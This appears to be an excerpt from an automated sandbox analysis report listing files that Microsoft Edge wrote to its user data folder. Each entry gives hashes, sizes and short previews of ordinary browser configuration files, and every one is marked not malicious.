                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):11755
                                                                                        Entropy (8bit):5.190465908239046
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                        MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                        SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                        SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                        SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f81e3134-3131-4a5f-ae37-881fff727237.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):24691
                                                                                        Entropy (8bit):5.568003879191055
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:7rTzUvWF8W5w6Bf4bK8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP3nIOTAarwX0p+tuQ:7HIvS8Wa6BfCKu1ja6XEfNt/
                                                                                        MD5:D09312259E4A97A24FE75C390E1A9708
                                                                                        SHA1:90FD23BBD2C1A9446BADC82EB7D585F000D0D707
                                                                                        SHA-256:9F0A73F743C9768CC48F0E5DFFAF3652266547A31AB87034A4DBEE3E8C58463D
                                                                                        SHA-512:7AA342A807CFBDB26F11C32C6C84F684221F34DA4CCA04A8A03F0600187A7083AC29956B451AE1BA9DDD10826BC076FBC6D15850CF5E43A9D2CB46101F77374E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13366271669386045","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13366271669386045","location":5,"ma

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fd6968d9-acd8-4f28-ad02-af30d022fc34.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):10514
                                                                                        Entropy (8bit):5.207892051157007
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:stFkdZs6haFvrENbdxPko33a38WbV+FMBQAMUrPVYJ:stFSs6hCDEhT6PbGqQeO
                                                                                        MD5:609310C2584F796DE7D0A8D9AF7B2C83
                                                                                        SHA1:9E2E4D76A84149102604809E3423D50D97B791D4
                                                                                        SHA-256:831ABF04E79783F381FA34AF9E49B3BC17973FCE70B4537BB395160CCEA30770
                                                                                        SHA-512:5340611FAEE94DFE2F89BAB96DE26EFC33E87B3FB6AF4609E57542F8F7F130324292958C776FAB6E1F02B8A3DED18AC11350F13414C062F09A991BE671630927
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366271670076295","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):120
                                                                                        Entropy (8bit):3.32524464792714
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                        MD5:A397E5983D4A1619E36143B4D804B870
                                                                                        SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                        SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                        SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):13
                                                                                        Entropy (8bit):2.6612262562697895
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:NYLFRQZ:ap2Z
                                                                                        MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                        SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                        SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                        SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:117.0.2045.55

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):44455
                                                                                        Entropy (8bit):6.089788594451763
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW4di1zNtPMZkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynA+kzItSmd6qE7lFoC
                                                                                        MD5:F7E50F66FBD14FCB294153E556D0883C
                                                                                        SHA1:0DC38CA21F547792F71DACCAD88789444FA71B82
                                                                                        SHA-256:3ADBA556FA601793CD5D8E40A77F6028ADB6AD0E54D9E1F8EFC8FBDF38F8D83C
                                                                                        SHA-512:F0C02EA95CD5CBA173C7AACA5EE3BDDA6247A9EBD325D889F5CDAB28B399F8311E5FB8F7B82945096BB6D91F3D7002BE8AE290B641704768CF81447BCF2C8EBE
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a960.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):44455
                                                                                        Entropy (8bit):6.089788594451763
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW4di1zNtPMZkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynA+kzItSmd6qE7lFoC
                                                                                        MD5:F7E50F66FBD14FCB294153E556D0883C
                                                                                        SHA1:0DC38CA21F547792F71DACCAD88789444FA71B82
                                                                                        SHA-256:3ADBA556FA601793CD5D8E40A77F6028ADB6AD0E54D9E1F8EFC8FBDF38F8D83C
                                                                                        SHA-512:F0C02EA95CD5CBA173C7AACA5EE3BDDA6247A9EBD325D889F5CDAB28B399F8311E5FB8F7B82945096BB6D91F3D7002BE8AE290B641704768CF81447BCF2C8EBE
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a970.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):44455
                                                                                        Entropy (8bit):6.089788594451763
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW4di1zNtPMZkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynA+kzItSmd6qE7lFoC
                                                                                        MD5:F7E50F66FBD14FCB294153E556D0883C
                                                                                        SHA1:0DC38CA21F547792F71DACCAD88789444FA71B82
                                                                                        SHA-256:3ADBA556FA601793CD5D8E40A77F6028ADB6AD0E54D9E1F8EFC8FBDF38F8D83C
                                                                                        SHA-512:F0C02EA95CD5CBA173C7AACA5EE3BDDA6247A9EBD325D889F5CDAB28B399F8311E5FB8F7B82945096BB6D91F3D7002BE8AE290B641704768CF81447BCF2C8EBE
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3abb2.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):44455
                                                                                        Entropy (8bit):6.089788594451763
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW4di1zNtPMZkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynA+kzItSmd6qE7lFoC
                                                                                        MD5:F7E50F66FBD14FCB294153E556D0883C
                                                                                        SHA1:0DC38CA21F547792F71DACCAD88789444FA71B82
                                                                                        SHA-256:3ADBA556FA601793CD5D8E40A77F6028ADB6AD0E54D9E1F8EFC8FBDF38F8D83C
                                                                                        SHA-512:F0C02EA95CD5CBA173C7AACA5EE3BDDA6247A9EBD325D889F5CDAB28B399F8311E5FB8F7B82945096BB6D91F3D7002BE8AE290B641704768CF81447BCF2C8EBE
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3d320.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):44455
                                                                                        Entropy (8bit):6.089788594451763
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW4di1zNtPMZkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynA+kzItSmd6qE7lFoC
                                                                                        MD5:F7E50F66FBD14FCB294153E556D0883C
                                                                                        SHA1:0DC38CA21F547792F71DACCAD88789444FA71B82
                                                                                        SHA-256:3ADBA556FA601793CD5D8E40A77F6028ADB6AD0E54D9E1F8EFC8FBDF38F8D83C
                                                                                        SHA-512:F0C02EA95CD5CBA173C7AACA5EE3BDDA6247A9EBD325D889F5CDAB28B399F8311E5FB8F7B82945096BB6D91F3D7002BE8AE290B641704768CF81447BCF2C8EBE
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3ffed.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):44455
                                                                                        Entropy (8bit):6.089788594451763
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW4di1zNtPMZkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynA+kzItSmd6qE7lFoC
                                                                                        MD5:F7E50F66FBD14FCB294153E556D0883C
                                                                                        SHA1:0DC38CA21F547792F71DACCAD88789444FA71B82
                                                                                        SHA-256:3ADBA556FA601793CD5D8E40A77F6028ADB6AD0E54D9E1F8EFC8FBDF38F8D83C
                                                                                        SHA-512:F0C02EA95CD5CBA173C7AACA5EE3BDDA6247A9EBD325D889F5CDAB28B399F8311E5FB8F7B82945096BB6D91F3D7002BE8AE290B641704768CF81447BCF2C8EBE
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4bc38.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):44455
                                                                                        Entropy (8bit):6.089788594451763
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW4di1zNtPMZkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynA+kzItSmd6qE7lFoC
                                                                                        MD5:F7E50F66FBD14FCB294153E556D0883C
                                                                                        SHA1:0DC38CA21F547792F71DACCAD88789444FA71B82
                                                                                        SHA-256:3ADBA556FA601793CD5D8E40A77F6028ADB6AD0E54D9E1F8EFC8FBDF38F8D83C
                                                                                        SHA-512:F0C02EA95CD5CBA173C7AACA5EE3BDDA6247A9EBD325D889F5CDAB28B399F8311E5FB8F7B82945096BB6D91F3D7002BE8AE290B641704768CF81447BCF2C8EBE
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):47
                                                                                        Entropy (8bit):4.3818353308528755
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                        MD5:48324111147DECC23AC222A361873FC5
                                                                                        SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                        SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                        SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):35
                                                                                        Entropy (8bit):4.014438730983427
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                        MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                        SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                        SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                        SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"forceServiceDetermination":false}

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
